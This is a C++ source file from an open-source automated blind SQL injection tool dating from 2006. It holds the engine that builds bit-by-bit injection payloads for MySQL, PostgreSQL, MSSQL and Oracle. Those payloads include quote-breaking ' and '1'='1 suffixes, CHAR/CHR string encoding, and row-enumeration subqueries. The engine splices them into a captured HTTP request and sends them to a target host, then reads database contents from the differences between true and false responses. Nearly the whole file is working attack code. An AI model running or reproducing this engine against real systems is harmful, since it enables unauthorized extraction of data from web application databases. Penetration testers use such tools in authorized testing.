/*
** Injection Framework - Automatized Sql Injection Tool
** Copyright (C) 2006 Flowgate Security Consulting,
**         http://www.flowgate.net
**
** This program is free software; you can redistribute it and/or modify it
** under the terms of the GNU General Public License as published by the
** Free Software Foundation; either version 2 of the License, or (at your
** option) any later version.
** 
** This program is distributed in the hope that it will be useful, but
** WITHOUT ANY WARRANTY; without even the implied warranty of
** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
** General Public License for more details.
** 
** The GNU General Public License is available from http://www.gnu.org/ or
** the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston,
** MA 02111-1307, USA.
**
** For information on Injection Framework: fg_injector@flowgate.net

*/
#include "wx/wxprec.h"
//#ifdef __BORLANDC__
//#pragma hdrstop
//#endif
#ifndef WX_PRECOMP
#include "wx/wx.h"
#endif
#include "inference.h"
#include "urlfunctions.h"


wxString escape(wxString str){
	wxString result;
	for(unsigned p=0; p != str.length() ; p++ ){
		result += (((str[p]=='\'') || (str[p]=='"'))?wxString::FromAscii("\\")+str[p]:str[p]);
	}
    return result;
}

void BitMaskString::Clear(){
	mString.Clear();
	mMask.Clear();
	mReserved.Clear();
}
void BitMaskString::ReserveBit(int absoluteBitPos){
	size_t byte_pos = absoluteBitPos / 8;
	int bit_pos = absoluteBitPos % 8;
	if (byte_pos >= mMask.length()){
		mMask     += wxString::FromAscii((char) 0);
		mString   += wxString::FromAscii((char) 0);
		mReserved += wxString::FromAscii((char) 0);
	}
	mReserved[byte_pos] = mReserved[byte_pos]|(1<<bit_pos);
}
void BitMaskString::SetBit(int absoluteBitPos, bool value){
	size_t byte_pos = absoluteBitPos / 8;
	int bit_pos     = absoluteBitPos % 8;
	if (byte_pos >= mMask.length()){
		mMask   += wxString::FromAscii((char) 0);
		mString += wxString::FromAscii((char) 0);
		mReserved += wxString::FromAscii((char) 0);
	}
	mMask[byte_pos] = mMask[byte_pos]|(1<<bit_pos);
	mString[byte_pos] = mString[byte_pos]&(255^(1<<bit_pos));
	mString[byte_pos] = mString[byte_pos]|((value?1:0)<<bit_pos);
}
bool BitMaskString::IsNullterminated(){
	size_t i;
	for (i = 0; i<mMask.length();i++){
		if (mMask[i] != (wxChar) 0xff){
			break;	
		}
	}
	if(i > 0 && mString[i - 1] == 0) return true;
	return false;
}
int BitMaskString::FirstNotReserved(){
	size_t i;
	for (i = 0; i<mReserved.length();i++){
		if (mReserved[i] != (wxChar) 0xff){
			break;
		}
	}
	for(int j = 0; j <= 7; j++)
		if(!((mReserved[i] >> j) & 1)) return i * 8 + j;
//	wxFAIL_MSG(_("shouldnt be here"));
	return 0;
}


wxString BitMaskString::GetString(){
	size_t i;
	for (i = 0; i < mMask.length(); i++){
		if ((unsigned char) mMask[i] != (unsigned char) 255){
			break;	
		}
	}
	return mString.Mid(0,i);
}
bool InferenceEngine::mInstanceFlag = false;
InferenceEngine* InferenceEngine::mSingle = NULL;
void InferenceEngine::Stop(){
	mSequenceMin = mSequence;
	mRunning = 0;
	mIsInitializing = false;
	mResult.Clear();
	mLastResultLength = 0;
	mFieldNumber = -1;
	mBaseIndex.Clear();
	mIndex.Clear();
	mQueryFields.clear();
	DLOG(wxT("mBaseIndex:") + mBaseIndex + wxT("\n"));
	DLOG(wxT("mIndex:") + mIndex + wxT("\n"));
}
InferenceEngine* InferenceEngine::GetInstance()
{
	if(!mInstanceFlag)
	{
		mSingle = new InferenceEngine();
		mInstanceFlag = true;
		return mSingle;
	}
	else return mSingle;
}
InferenceEngine::InferenceEngine(){
	mSequence     = 0;
	mSequenceMin  = 0;
	mRunning      = true; 
	mEventThreads = 0;
	mFieldNumber  = -1;
	mQueryFields.clear();
	DLOG(wxString::Format(wxT("mFieldNumber %d\n"), mFieldNumber));
	mBaseIndex.Clear();
	mIndex.Clear();
	DLOG(wxT("mIndex:") + mIndex + wxT("\n"));
	DLOG(wxT("mBaseIndex:") + mBaseIndex + wxT("\n"));
}
//returns 0 if no errors, returns true/false in value
int InferenceEngine::GetValue(wxString html, bool &value){
	DLOG(wxString::Format(wxT("getvalue")));
	value = false;
	if(mInferenceType == ENG_AUTO){
		html.MakeLower();
		size_t pos = 0;
		int number_found = 0;
		if(html.Length()){
			pos = html.find(mDiferenciationString, pos);
			while(pos!=wxString::npos){
				number_found++;
				pos = html.find(mDiferenciationString, pos+1);
			}
		}
		if(number_found==0 && mNumberForFalse>0 && mNumberForTrue>0)
			return 1; //return error
		if(abs(number_found - mNumberForFalse)<abs(number_found- mNumberForTrue)) value = false;
		else value = true;
	}
	if(mInferenceType == ENG_BYKEY){
		if(html.find(mTrueKey) != wxString::npos) value = true;

	}
	return 0;
}
wxString InferenceEngine::GetRequest(int bitPosition){
	DLOG(wxString::Format(wxT("getrequest")));
	wxString request = mRequest;
	wxString sql;
	wxString query;
	wxString limit = wxT("");
	switch (mDatabaseType){
		case ENG_MYSQL:
		switch (mResultType){
			case ENG_SINGLE:
			query = wxT("(") + mQuery + wxT(")");
			break;
			case ENG_LIST:
			if (mFieldNumber == -1){
				query = wxT("select ascii(substring(cast( ") + mKeyName +  wxT(" as char), ") << bitPosition / 8 + 1 << wxT(", 1))&") << (1 << (bitPosition % 8)) << wxT(" ")<<mPostSql;
				limit = wxT(" limit 1");
			} else {
				query = wxT("select ascii(substring(cast( ") + mQueryFields[mFieldNumber]  +  wxT(" as char), ") << bitPosition / 8 + 1 << wxT(", 1))&") << (1 << (bitPosition % 8)) << wxT(" ")<<mPostSql;
				limit = wxT(" limit 1");
			}
			if (mHasWhere){
				query += wxT(" and 1=1 ");
			} else {
				query += wxT(" where 1=1 ");
			}
			if(mBaseIndex!=wxT("")){
				long val;
				wxString index_used;
				if(mBaseIndex.ToLong(&val)){
					index_used<<val;
				}else{
					index_used=SqlCharacters(mBaseIndex);
				}
				query<<  wxT(" and ") << mKeyName << wxT(">") << index_used;
			}
			if(mQuery.find(wxT("information_schema"))==-1)
				query<<wxT(" order by ") << mKeyName;
			query<<limit;
 		}
		if(mInjectionType == ENG_VALUES){
			;
		} else {
			if(!mIsInitializing){
				if(mResultType == ENG_LIST){
					sql << wxT(" and (") << query << wxT(")");
				} else{
					sql << wxT(" and (ascii(substring(rtrim(cast(") << query << wxT("as char)), ") << bitPosition / 8 + 1 << wxT(", 1))) & ") << (1 << (bitPosition % 8));
				}
			} else {
				sql << wxT(" and (") << query << wxT(")");
			}
		}
		if(mAddQuotes){
			if(mInjectionType == ENG_VALUES){
			} else {
				sql=wxT("'")+sql+wxT(" and '1'='1");
			}
		}
		DLOG(sql);
		sql = UrlEncode(sql);
		break;
		case ENG_PSSQL:
		switch (mResultType){
			case ENG_SINGLE:
				query = wxT("(") + mQuery + wxT(")");
			break;
			case ENG_LIST:
			if (mFieldNumber == -1){
				limit = wxT(" limit 1");
				query = wxT("(select ") + mKeyName + wxT(" ") + mPostSql;
			} else {
				limit = wxT(" limit 1");
				query = wxT("(select ") + mQueryFields[mFieldNumber] + wxT(" ") + mPostSql;
			}
			if (mHasWhere){
				query += wxT(" and 1=1 ");
			} else {
				query += wxT(" where 1=1 ");
			}
			if(mBaseIndex!=wxT("")){
				long val;
				wxString index_used;
				if(mBaseIndex.ToLong(&val)){
					index_used<<val;
				}else{
					index_used=SqlCharacters(mBaseIndex);
				}
				query<<  wxT(" and ") << mKeyName << wxT(">") << index_used;
			}
			query<<wxT(" order by ") << mKeyName << limit << wxT(")");
 		}
		if(mInjectionType==ENG_VALUES){
			if(!mIsInitializing){
				sql << wxT("(select case when ascii(substring(rtrim(cast(") << query << wxT("as varchar)), ") << bitPosition / 8 + 1 << wxT(", 1)) # ") << (1 << (bitPosition % 8)) << wxT(" between 0 and ascii(substring(rtrim(cast(") << query << wxT("as varchar)), ") << bitPosition
 / 8 + 1 << wxT(", 1)) then ") << mTrueStr << wxT(" else ") << mFalseStr << wxT(" end)");
			} else {
				sql << wxT("(select case when ( ")<< query <<wxT(" ) then ") << mTrueStr << wxT(" else ") << mFalseStr << wxT(" end)");
			}
		} else {
			if(!mIsInitializing){
				sql << wxT("and (ascii(substring(rtrim(cast(") << query << wxT("as varchar)), ") << bitPosition / 8 + 1 << wxT(", 1)) # ") << (1 << (bitPosition % 8)) << wxT(" between 0 and ascii(substring(rtrim(cast(") << query << wxT("as varchar)), ") << bitPosition / 8 + 1 << wxT(", 1)))");
			} else {
				sql << wxT("and (") << query << wxT(")");
			}
		}
		if(mAddQuotes){
			if(mInjectionType == ENG_VALUES){
				sql=wxT("'||")+sql+wxT("||'");
			} else {
				sql=wxT("'")+sql+wxT(" and '1'='1");
			}
		}
		DLOG(sql);
		sql = UrlEncode(sql);
		break;
		case ENG_MSSQL:
		switch (mResultType){
			case ENG_SINGLE:
				query = wxT("(") + mQuery + wxT(")");
			break;
			case ENG_LIST:
			if (mFieldNumber == -1){
				query = wxT("(select top 1 ") + mKeyName +wxT(" ")+ mPostSql;
			} else {
				query = wxT("(select top 1 ") + mQueryFields[mFieldNumber] + wxT(" ") + mPostSql;
			}
			if (mHasWhere){
				query += wxT(" and 1=1 ");
			} else {
				query += wxT(" where 1=1 ");
			}
			if(mBaseIndex!=wxT("")){
				long val;
				wxString index_used;
				if(mBaseIndex.ToLong(&val)){
					index_used<<val;
				}else{
					index_used=SqlCharacters(mBaseIndex);
				}
				query<<  wxT(" and ") << mKeyName << wxT(">") << index_used;
			}
			query << wxT(" order by ") << mKeyName << wxT(")");
 		}
		if(mInjectionType==ENG_VALUES){
			if(!mIsInitializing){
				sql << wxT("(select case when ascii(substring(rtrim(cast(") << query << wxT("as char)), ") << bitPosition / 8 + 1 << wxT(", 1)) ^ ") << (1 << (bitPosition % 8)) << wxT(" between 0 and ascii(substring(rtrim(cast(") << query << wxT("as char)), ") << bitPosition
 / 8 + 1 << wxT(", 1)) then ") << mTrueStr << wxT(" else ") << mFalseStr << wxT(" end)");
			} else {
				sql << wxT("(select case when ( ")<< query <<wxT(" ) then ") << mTrueStr << wxT(" else ") << mFalseStr << wxT(" end)");
			}
		} else {
			if(!mIsInitializing){
				sql << wxT("and (ascii(substring(rtrim(cast(") << query << wxT("as char)), ") << bitPosition / 8 + 1 << wxT(", 1)) ^ ") << (1 << (bitPosition % 8)) << wxT(" between 0 and ascii(substring(rtrim(cast(") << query << wxT("as char)), ") << bitPosition / 8 + 1 << wxT(", 1)))");
			} else {
				sql << wxT("and (") << query << wxT(")");
			}
			DLOG(sql);
		}
		if(mAddQuotes){
			if(mInjectionType == ENG_VALUES){
				sql=wxT("'+")+sql+wxT("+'");
			} else {
				sql=wxT("'")+sql+wxT(" and '1'='1");
			}
		}
		sql = UrlEncode(sql);

		break;
		case ENG_ORACLE:
		switch (mResultType){
			case ENG_SINGLE:
				query = wxT("(") + mQuery + wxT(")");
			break;
			case ENG_LIST:
			wxString where_cond;
			if(mHasWhere){
				where_cond=wxT(" and ")+mWhereCond;
			}
			if(mBaseIndex!=wxT("")){
				long val;
				wxString index_used;
				if(mBaseIndex.ToLong(&val)){
					index_used<<val;
				}else{
					index_used=SqlCharacters(mBaseIndex);
				}
				where_cond = wxT(" and ");
				where_cond << mKeyName << wxT(">") << index_used;
			}
			if (mFieldNumber == -1){
				query = wxT("(select ") + mKeyName +wxT(" from(select row_number() over (order by ")+mKeyName+wxT(") as injectorkey,  ")+ mKeyName + wxT(" FROM ")+mFromSql+wxT(" where  1=1")+where_cond+wxT(") where injectorkey=1) ");
			} else {
				query = wxT("(select ") + mQueryFields[mFieldNumber] +wxT(" from(select row_number() over (order by ")+mKeyName+wxT(") as injectorkey,  ")+ mQueryFields[mFieldNumber] + wxT(" FROM ")+mFromSql+wxT(" where 1=1")+where_cond+wxT(")where injectorkey=1) ");
			}
 		}
		if(mInjectionType==ENG_VALUES){
			if(!mIsInitializing){
				sql << wxT("(select case when bitand(ascii(substr(cast(") << query << wxT("as varchar(3000)), ") << bitPosition / 8 + 1 << wxT(", 1)), ") << (1 << (bitPosition % 8)) << wxT(") between 1 and 255 then ")<<mTrueStr<<wxT(" else ")<<mFalseStr<<wxT(" end from dual)");
			} else {
				sql << wxT("(select case when ( ")<< query <<wxT(" ) then ") << mTrueStr << wxT(" else ") << mFalseStr << wxT(" end from dual)");
			}
		} else {
			if(!mIsInitializing){
				sql << wxT("and (bitand(ascii(substr(cast(") << query << wxT("as varchar(3000)), ") << bitPosition / 8 + 1 << wxT(", 1)), ") << (1 << (bitPosition % 8)) << wxT(") between 1 and 255)");
			} else {
				sql << wxT("and (") << query << wxT(")");
			}
			DLOG(sql);
		}
		if(mAddQuotes){
			if(mInjectionType == ENG_VALUES){
				sql=wxT("'||")+sql+wxT("||'");
			} else {
				sql=wxT("'")+sql+wxT(" and '1'='1");
			}
		}
		sql = UrlEncode(sql);

		break;
	}
	size_t pos = mRequest.find(wxT("~~~"));
	request.replace(pos, 3, sql);
	return request;
}
wxString InferenceEngine::SqlCharacters(wxString string){
	wxString charStr,r;
	if(mDatabaseType!=ENG_MYSQL){
		if(mDatabaseType==ENG_PSSQL||mDatabaseType==ENG_ORACLE)
			charStr=wxT("chr");
		else
			charStr=wxT("char");
		if(string.length()==0) return charStr+wxT("(0)");
		for(unsigned i=0; i<string.length();i++){
			if(i!=0)
				if(mDatabaseType==ENG_PSSQL||mDatabaseType==ENG_ORACLE)
					r+=wxT("||");
				else
					r+=wxT("+");
			r<<charStr<<wxT("(")<<((int)string[i])<<wxT(")");
		}
	} else {
		if(string.length()==0) return wxT("char(0)");
		r<<wxT("concat(");
		for(unsigned i=0; i<string.length();i++){
			if(i!=0)r+=wxT(",");
			r<<wxT("char(")<<((int)string[i])<<wxT(")");
		}
		r<<wxT(")");
	}
	return r;
}
wxString InferenceEngine::Initialize(){
	if(mRunning) return wxT("Stop the running inference before configuring");
	if(!mPort) return wxT("Missing Target Port.");
	if(!mRequest) return wxT("Missing Injectable Request.");
	if(!mHostname) return wxT("Missing Target Host.");
	if(!mInferenceType == ENG_AUTO) return wxT("Inicialization is only required for Automatic Inference Type.");
	if(mInjectionType == ENG_VALUES && mDatabaseType == ENG_MYSQL) return wxT("Injection by value for MySQL is not supported.");
	mResultType = ENG_SINGLE;
	mIsInitializing = true;
	mRunning = true;
	mQuery = wxT("1=1");
	mNumberForFalse = -1;
	mNumberForTrue = -1;
	mTrueRequest = wxT("");
	mFalseRequest = wxT("");
	DLOG(wxString::Format(wxT("initializing")));
	MakeInjection();
	return wxT("");
}
wxString InferenceEngine::StartInjections(){
	if(!mPort) return wxT("Missing Target Port.");
	if(!mRequest) return wxT("Missing Injectable Request.");
	if(!mHostname) return wxT("Missing Target Host.");
	if(!mQuery) return wxT("Missing Query.");
	if(mInjectionType == ENG_VALUES && !mTrueStr) return wxT("Missing True Value.");
	if(mInjectionType == ENG_VALUES && !mFalseStr) return wxT("Missing False Value.");
	if(mInferenceType == ENG_BYKEY && !mTrueKey) return wxT("Missing True Keyphrase.");
	if(mInferenceType == ENG_AUTO && !mDiferenciationString) return wxT("Automatic Inference not initialized.");
	if(mResultType == ENG_LIST && !mKeyName) return wxT("Missing Index.");
//	if(mResultType == ENG_LIST && mDatabaseType == ENG_ORACLE && mHasWhere) return wxT("Where keyword not supported for Oracle");

	mRunning = true;
	DLOG(wxString::Format(wxT("doinjection")));
	for(int i = 1; i <= mNumConnections; i++){
		mEventThreads++;
		MakeInjection();
	}
	return wxT("");
}
wxString InferenceEngine::GetStateMsg(){
	if(mIsInitializing) return wxT("Initializing");
	else if(mRunning) return wxT("Running");
	else if(mNumberForFalse != mNumberForTrue) return wxT("Initialized and waiting");
	return wxT("Not initialized and waiting");
}
void InferenceEngine::MakeInjection(){
	int next_unset_bit = mResult.FirstNotReserved();
	mResult.ReserveBit(next_unset_bit); //reserve bit
	wxString request = GetRequest(next_unset_bit);
	MyClientCollection *client_collection = MyClientCollection::GetInstance();
	MyClient* client   = client_collection->GetClient();
	ClientInfo* data   = new ClientInfo;
	data->mSequence    = mSequence++;
	data->mBitPosition = next_unset_bit;
	data->mBaseIndex   = mBaseIndex;
	data->mFieldNumber = mFieldNumber;
	client->SetRequestData(mHostname, mPort,request, InferenceEngine::SocketCallback, data);
	client->DoRequest();
}
void InferenceEngine::SocketCallback(MyClient* client, void* clientData){
	DLOG(wxString::Format(wxT("socketcallback")));
	wxString answer = client->mAnswer;
	if(answer.length()){
		InferenceEngine* engine = GetInstance();
		engine->Continue(answer, ((ClientInfo*)clientData)->mSequence, ((ClientInfo*)clientData)->mBaseIndex, ((ClientInfo*)clientData)->mFieldNumber, ((ClientInfo*)clientData)->mBitPosition);
		delete (ClientInfo*)clientData;
		delete client;
	} else{
		//error. stop
		InferenceEngine* engine = GetInstance();
		engine->mEventThreads--;
	}
}
//return true if a direrenciation string was found
bool InferenceEngine::DecideDiferenciation(){
	vector<wxString> separators; 
	separators.push_back(wxT("\n"));
	separators.push_back(wxT("<br"));
	separators.push_back(wxT("<p"));
	separators.push_back(wxT("<b"));
	separators.push_back(wxT(" "));
	unsigned separator_index = 0;
	mFalseRequest.MakeLower();
	mTrueRequest.MakeLower();
	int dif = 0;
	for(separator_index = 0; separator_index<separators.size(); separator_index++){
		wxString separator = separators[separator_index];
		size_t pos = 0;
		int number_for_true = 0;
		if(mTrueRequest.Length()){
			pos = mTrueRequest.find(separator, pos);
			while(pos!=wxString::npos){
				number_for_true++;
				pos = mTrueRequest.find(separator, pos+1);
			}
		}
		pos = 0;
		int number_for_false = 0;
		if(mFalseRequest.Length()){
			pos = mFalseRequest.find(separator, pos);
			while(pos!=wxString::npos){
				number_for_false++;
				pos = mFalseRequest.find(separator, pos+1);
			}
		}
		if(abs(number_for_false - number_for_true)>dif){
			dif = abs(number_for_false - number_for_true);
			mNumberForFalse = number_for_false;
			mNumberForTrue = number_for_true;
			mDiferenciationString = separators[separator_index];
			if(dif>1) break;//keep first diferentiator with dif>1
		}
	};
	if(dif == 0) return false; //no differnce found between true and false
	return true;
}
void InferenceEngine::Continue(wxString const request, int sequence, wxString index, int fieldNumber, int bitPosition){
	DLOG(wxString::Format(wxT("continue")));
	if(!mRunning || sequence < mSequenceMin){
		mEventThreads--;
		return;
	} if(mIsInitializing){
		//mNumberForX = -1 means mTrueStr was not retrieved yet
		//mNumberForX = -2 means mTrueStr was retrieved
		//no va mNumberForX = -3 means mTrueStr and mFalseStr was retrieved
		if(mNumberForTrue == -1){
			mTrueRequest = request;
			mQuery = wxT("0=1");
			mNumberForTrue = -2;
			mNumberForFalse = -2;
			MakeInjection();
		} else if(mNumberForFalse == -2){
			mFalseRequest = request;
			mRunning = false;
			mIsInitializing = false;
			if(DecideDiferenciation()) mpView->UpdateEngineState(wxT(""));
			else mpView->UpdateEngineState(wxT("Couldn't find differences between True and False"));
			/*	mNumberForFalse = -3;
			mNumberForTrue = -3;
			MakeInjection();*/
		}/* else {
			mRunning = false;
			mIsInitializing = false;
			if(DecideDiferenciation()) mpView->UpdateEngineState(wxT(""));
			else mpView->UpdateEngineState(wxT("Couldn't find differences between True and False"));
		}*/
	} else {
		bool value;
		int error = GetValue(request, value);
		if (error){
			*mpOutput<<wxT("error");
			//more info
		} else {
			if (mResultType == ENG_SINGLE || (fieldNumber == mFieldNumber && index == mBaseIndex)){
				DLOG(wxString::Format(wxT("setbit %d %d"),bitPosition, value));
				mResult.SetBit(bitPosition, value);
				wxString result = mResult.GetString();
				if (result.length() > mLastResultLength){
					if (mResultType == ENG_LIST && !mResult.IsNullterminated() && result.length() == 1 && mFieldNumber == -1){
						*mpOutput<<wxT("\nKey ")<<mKeyName<<wxT(":");
					}
					wxString tem = ((mResult.GetString()).Mid(mLastResultLength));
					*mpOutput<<tem;
					mLastResultLength = result.length();
				//more info
				}
			}
		}
		if (mResult.IsNullterminated()){
			wxString value = mResult.GetString();
			value = value.Mid(0,value.Length()-1);
			mResult.Clear();
			mLastResultLength = 0;
			if (mResultType == ENG_LIST){
				if (mFieldNumber == -1){
					if (value.Length()){
						//mIndex = escape(value); usado en el sistema viejo
						mIndex = value;
						DLOG(wxT("mIndex:") + mIndex+ wxT("\n"));
					} else {
//						*mpOutput<<wxT("\n__end_of_list__\n");
						*mpOutput<<wxT("\n");
						mRunning = false;
						mpView->UpdateEngineState(wxT(""));
						return;
					}
				} 
				mFieldNumber++;
				DLOG(wxString::Format(wxT("mFieldNumber %d\n"), mFieldNumber ));
				if (mFieldNumber < (int) mQueryFields.size() && mQueryFields[mFieldNumber] == mKeyName){
					mFieldNumber++;
					DLOG(wxString::Format(wxT("mFieldNumber %d\n"), mFieldNumber ));
				}
				if (mFieldNumber >= (int) mQueryFields.size()) {
					mFieldNumber = -1;
					DLOG(wxString::Format(wxT("mFieldNumber %d\n"), mFieldNumber ));
					mBaseIndex = mIndex;
					DLOG(wxT("mBaseIndex:") + mBaseIndex + wxT("\n"));
				} else {
					*mpOutput<<wxT(" ")<<mQueryFields[mFieldNumber]<<wxT(":");
				}
				MakeInjection();
			} else {
				mRunning = false;
				mpView->UpdateEngineState(wxT(""));				
				*mpOutput<<wxT("\n");
			}
		} else {
			MakeInjection();
		}
	}
}
wxString& operator<<(wxString& stream, BitMaskString& string){
	size_t i;
	for (i = 0; i < string.mMask.length(); i++){
		if ((unsigned char) string.mString[i] != (unsigned char) 255){
			break;
		}
	}
	stream << string.mString.Mid(i);
	return stream;
}
void InferenceEngine::SetOptions(InferenceType inferenceType, 
				ResultType resultType,
				InjectionType injectionType,	
				wxString trueStr, 
				wxString falseStr, 
				wxString trueKey, 
				wxString falseKey, 
				wxString query, 
				wxString keyName,
				wxTextCtrl *outputStream, 
				wxString hostname, 
				wxString port, 
				wxString request, 
				DatabaseType databaseType, 
				int numConnections,
				EngineView *view,
				bool addQuotes){
	mAddQuotes  = addQuotes;
	mQuery      = query;
	mResultType = resultType;
	mKeyName    = keyName;
	mTrueKey    = trueKey;
	mFalseKey   = falseKey;
	mInferenceType  = inferenceType;
	mInjectionType  = injectionType;
	mTrueStr    = trueStr;
	mFalseStr   = falseStr;
	mpOutput    = outputStream;
	mHostname   = hostname;
	mPort       = port;
	mpView      = view;
	mRequest    = request;
	mDatabaseType   = databaseType;
	mNumConnections = numConnections;

	//replace stings by expressions
	wxString new_query,quoted_string;
	bool inside_string=false;
	for(size_t i=0; i<mQuery.Length(); i++){
		if(mQuery[i]=='\''){
			if(inside_string){
				new_query+=wxT("(")+SqlCharacters(quoted_string)+wxT(")");
				quoted_string.Clear();
				inside_string=false;
			}else{
				inside_string=true;
			}
		}else{
			if(inside_string){
				quoted_string+=mQuery[i];
			} else {
				new_query+=mQuery[i];
			}
		}
	}
	mQuery=new_query;
	//parse options
	wxString lc_query = mQuery.Lower();
	size_t where_pos = lc_query.find(wxT(" where"));
	if(where_pos == wxString::npos)where_pos = lc_query.find(wxT("\twhere"));
	mWhereCond=mQuery.Mid(where_pos+7);
	size_t from_pos = lc_query.find(wxT("from"));
	wxString pre_query = mQuery;
	if(from_pos != wxString::npos){
		mPostSql = mQuery.Mid(from_pos);
		pre_query = mQuery.Mid(0, from_pos);
		if(where_pos==wxString::npos)
			mFromSql = mQuery.Mid(from_pos+4);
		else
			mFromSql = mQuery.Mid(from_pos+4,where_pos-from_pos-4);
		mFromSql.Trim().Trim(false);
    }
	
	wxString lc_post_sql = mPostSql.Lower();
	mHasWhere = false;
	size_t pos = lc_post_sql.find(wxT(" where"));
	if(pos != wxString::npos)mHasWhere = true;
	pos = lc_post_sql.find(wxT("\twhere"));
	if(pos != wxString::npos)mHasWhere = true;

	pos = lc_query.find(wxT("select"));
	if(pos != wxString::npos && pos < from_pos){
		pos += 6; //len select
		size_t prev_pos = pos;
		while((pos = lc_query.find_first_of(wxString::FromAscii(","), prev_pos + 1)) != wxString::npos && pos < from_pos){
			mQueryFields.push_back(mQuery.Mid(prev_pos + 1, pos - 1 - prev_pos));
			DLOG(wxT("pushback:") + mQuery.Mid(prev_pos + 1, pos - 1 - prev_pos) + wxT("\n"));
			prev_pos = pos;
		}
		mQueryFields.push_back(mQuery.Mid(prev_pos + 1, from_pos - 1 - prev_pos));
		DLOG(wxT("pushback:") + mQuery.Mid(prev_pos + 1, from_pos - 1 - prev_pos) + wxT("\n"));
	}
	vector<wxString> :: iterator iter;
	for(iter = mQueryFields.begin(); iter != mQueryFields.end() ; iter++ ){
		*iter = (iter->Trim()).Trim(false);
	}
}

